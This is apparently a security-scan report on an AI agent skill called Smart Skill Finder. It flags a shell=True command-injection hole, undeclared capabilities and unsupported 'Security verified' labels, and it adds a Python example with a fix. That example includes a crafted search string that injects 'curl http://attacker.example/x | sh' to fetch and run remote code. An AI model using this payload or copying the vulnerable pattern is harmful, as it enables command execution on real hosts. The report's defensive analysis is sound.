Smart Skill Finder

Security checks across malware telemetry and agentic risk

Overview

This is a real skill-finding tool, but it should be reviewed because normal search text can be passed into a local shell command and some trust claims are overbroad.

Install only after review or patching. Use it only for explicit skill-search requests. Do not rely on its "Security verified" or "Security scan pending" labels without checking the original registry or repository. Before enabling it in a normal agent environment, fix the Skills CLI call so the search text is passed as one element of an argument list instead of being interpolated into a string run with shell=True.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (8)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# Execute Skills CLI search
# search_terms is user-controlled; with shell=True the shell parses the whole string
cmd = f'npx skills find "{search_terms}" --json'
result = subprocess.run(
    cmd,
    shell=True,
    capture_output=True,
    text=True,
    timeout=10,
)
Confidence
99% confidence
Finding
result = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=10 )

Lp3

Medium
Category
MCP Least Privilege
Confidence
89% confidence
Finding
The skill documentation presents a benign recommendation tool, but the detected capabilities indicate it can use network and shell access without declaring those permissions. Undeclared execution and outbound connectivity reduce transparency and can expose users to command execution, data exfiltration, or unexpected external interactions during what appears to be a simple search workflow.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
This is a genuine description-behavior mismatch: the skill claims to only find and recommend skills, but also appears to invoke shell commands, access multiple external services, and use browser automation/scraping. That broader behavior materially increases risk because users and policy systems may grant trust based on the stated purpose while hidden capabilities enable unanticipated command execution and collection of remote content.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The examples claim specific third-party skills are 'Security verified' or 'Security scan pending' even though the skill's stated purpose is discovery and recommendation, not security assessment. This can mislead users into trusting and installing external code based on unsupported assurances, increasing supply-chain risk if a recommended skill is malicious or unsafe.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The Skills CLI integration gives user-controlled search text direct influence over a shell command, which expands the skill from simple discovery into command-execution capability. In an agent context, this is especially dangerous because user prompts may be attacker-controlled and the host environment may contain credentials, files, or network access.
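The following is an added example, not code from Smart Skill Finder or from SkillSpector. It serves the overview's patching advice, the "subprocess module call" finding and this finding: it shows what a POSIX shell makes of the flagged f-string when the search text is hostile, and the argument-list replacement in which the search text is exactly one argv element. The command shape `npx skills find <terms> --json` is taken from the flagged snippet; the attacker string, the length limit, the leading-dash check and the injectable `runner` parameter are assumptions made for illustration, not documented Skills CLI behaviour.

```python
"""Flagged shell=True pattern next to an argv-based replacement (illustrative code)."""
import shlex
import subprocess
from typing import Callable, List

# Constructed attacker-controlled search text: it could arrive verbatim in a
# user prompt or in web content the agent was asked to summarise.
MALICIOUS_TERM = 'pdf tools" ; curl http://attacker.example/x | sh ; echo "'


def vulnerable_command(search_terms: str) -> str:
    """The pattern the scanner flagged: user text interpolated into a shell string."""
    return f'npx skills find "{search_terms}" --json'


def shell_view(command: str) -> List[str]:
    """Tokenise the string the way /bin/sh would, without running it.

    The closing quote inside MALICIOUS_TERM ends the quoted argument, so the
    remainder ("; curl ... | sh ;") becomes separate commands for the shell.
    """
    return shlex.split(command)


def validate_search_terms(search_terms: str) -> str:
    """Passing argv removes shell injection; these checks address argument
    injection into the CLI itself. The limits are assumptions, not CLI rules."""
    terms = search_terms.strip()
    if not terms:
        raise ValueError("empty search text")
    if len(terms) > 200:
        raise ValueError("search text too long")
    if terms.startswith("-"):
        raise ValueError("search text would be parsed as a CLI option")
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in terms):
        raise ValueError("control characters are not allowed")
    return terms


def safe_argv(search_terms: str) -> List[str]:
    """Build the command as an argument list: the search text is one argv
    element and is never parsed by a shell, whatever characters it contains."""
    return ["npx", "skills", "find", validate_search_terms(search_terms), "--json"]


def run_search(search_terms: str, runner: Callable = subprocess.run) -> str:
    """Run the hardened call and return its stdout.

    `runner` is injectable so the logic can be exercised offline; the keyword
    arguments mirror the flagged call with shell=True removed.
    """
    result = runner(
        safe_argv(search_terms),
        shell=False,
        capture_output=True,
        text=True,
        timeout=10,
    )
    if result.returncode != 0:
        raise RuntimeError(f"skills find failed: {result.stderr.strip()}")
    return result.stdout


if __name__ == "__main__":
    # Shell's view of the vulnerable string: 'curl', '|', 'sh' appear as commands.
    print(shell_view(vulnerable_command(MALICIOUS_TERM)))
    # Hardened form: the same text stays a single argument.
    print(safe_argv(MALICIOUS_TERM))
```

The argument list closes the shell-injection path but not every abuse: a search term that the CLI itself interprets as an option is still an argument-injection risk, which is why `validate_search_terms` rejects a leading dash rather than trusting that `npx skills find` treats everything after the subcommand as plain text. If the CLI documents an end-of-options marker, passing it before the search text is the cleaner fix.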

Vague Triggers

Medium
Confidence
75% confidence
Finding
The README frames invocation as broad natural-language requests such as 'Simply ask natural language questions about what you need,' which can make the skill trigger on ambiguous prompts. In an agent environment, overly broad activation criteria can cause unintended tool use, unnecessary external lookups, or accidental disclosure of contextual data to search backends.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The README states that the skill reads existing skills, considers project context, references past conversations, and learns preferences over time, but it does not provide a privacy notice, consent model, or data-handling constraints. In a discovery skill, this increases the risk of over-collection or unintended use of sensitive workspace and memory data beyond what users expect for simple recommendations.

Vague Triggers

Medium
Confidence
87% confidence
Finding
The activation guidance is overly broad and matches common phrases such as 'How do I do X?' or 'Can you help me with X?', which can cause this skill to trigger for many unrelated requests. In context, that is risky because the skill has network/shell/search capabilities, so excessive invocation expands the chance of unintended external access or behavior outside the user's expectation.

VirusTotal

64/64 vendors reported this skill as clean. This is a file-reputation result from antivirus engines; it does not assess the shell-injection or capability-mismatch findings above.

View on VirusTotal